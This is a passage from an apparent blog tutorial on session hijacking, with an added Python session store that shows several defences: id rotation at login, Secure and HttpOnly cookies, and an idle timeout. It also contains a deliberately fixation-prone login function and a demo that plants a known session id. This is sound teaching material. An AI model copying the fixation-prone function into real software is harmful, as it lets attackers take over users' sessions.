  • Cross-site scripting, where the attacker tricks the user's computer into running code which is treated as trustworthy because it appears to belong to the server, allowing the attacker to obtain a copy of the cookie or perform other operations.
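Each of the four methods above has a matching server-side control: issuing a fresh session id at login defeats fixation, an unguessable id and a Secure cookie blunt sidejacking, HttpOnly keeps the cookie away from injected script, and an idle timeout limits how long a stolen id stays useful. The following is an added example in Python, not part of the original post and not any particular framework's code, showing a small session store with those controls next to the fixation-prone login it replaces. The store is an in-memory dictionary, and the user names and planted id are constructed for the demonstration.

```python
"""Server-side session handling that closes the holes in the list above:
an unguessable id, a fresh id issued at login (defeats session fixation),
a cookie marked Secure, HttpOnly and SameSite (keeps the cookie off plain HTTP
and away from script after cross-site scripting), and an idle timeout that
limits how long a stolen id stays usable.

Added example, not from the original post; the store is a plain in-memory
dictionary and the user names are constructed for the demonstration.
"""
import secrets
import time
from http.cookies import SimpleCookie

COOKIE_NAME = "SESSIONID"


class SessionStore:
    def __init__(self, idle_timeout: float = 900, clock=time.time):
        self.sessions = {}            # sid -> {"user": str | None, "last": float}
        self.idle_timeout = idle_timeout
        self.clock = clock            # injectable so the timeout can be tested

    @staticmethod
    def new_sid() -> str:
        return secrets.token_urlsafe(32)   # 256 bits from the OS CSPRNG, never sequential

    def start(self) -> str:
        """Anonymous pre-login session (a shopping cart, for example)."""
        sid = self.new_sid()
        self.sessions[sid] = {"user": None, "last": self.clock()}
        return sid

    def login(self, presented_sid, user: str) -> str:
        """Rotate the id at authentication: whatever the client presented, planted
        by an attacker or not, is discarded and a brand-new id is issued."""
        self.sessions.pop(presented_sid, None)
        sid = self.new_sid()
        self.sessions[sid] = {"user": user, "last": self.clock()}
        return sid

    def resolve(self, sid):
        """Return the user for a live authenticated session, expiring idle ones."""
        s = self.sessions.get(sid)
        if s is None:
            return None
        if self.clock() - s["last"] > self.idle_timeout:
            del self.sessions[sid]
            return None
        s["last"] = self.clock()
        return s["user"]

    def logout(self, sid) -> None:
        self.sessions.pop(sid, None)     # invalidate server-side, not just the cookie


def login_fixation_prone(store: SessionStore, presented_sid: str, user: str) -> str:
    """The anti-pattern: the client-chosen id is kept, so an id planted via a link
    becomes an authenticated session the attacker already knows."""
    store.sessions[presented_sid] = {"user": user, "last": store.clock()}
    return presented_sid


def session_cookie_header(sid: str) -> str:
    """Set-Cookie line: Secure keeps it off plain HTTP, HttpOnly keeps it from script."""
    c = SimpleCookie()
    c[COOKIE_NAME] = sid
    c[COOKIE_NAME]["secure"] = True
    c[COOKIE_NAME]["httponly"] = True
    c[COOKIE_NAME]["samesite"] = "Lax"
    c[COOKIE_NAME]["path"] = "/"
    return c.output(header="Set-Cookie:")


def demo_fixation() -> tuple:
    """Plant an id the attacker knows, log the victim in both ways, and see which
    store lets the planted id resolve to the victim. Returns (hardened, prone)."""
    planted = "attacker-chosen-id"
    hardened = SessionStore()
    hardened.login(planted, "alice")
    prone = SessionStore()
    login_fixation_prone(prone, planted, "alice")
    return hardened.resolve(planted), prone.resolve(planted)


if __name__ == "__main__":
    print("hardened vs fixation-prone:", demo_fixation())   # (None, 'alice')
    print(session_cookie_header(SessionStore.new_sid()))
```

The Secure flag is only meaningful when the whole site is served over HTTPS; a login page on HTTPS with the rest of the site on HTTP, the situation described under sidejacking, would stop the browser from sending the cookie at all, which is the right failure mode.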
That's all for today; later we will discuss in detail how to do Session Hijacking practically.
I hope you all like this...
If you have any queries ask me in form of comments...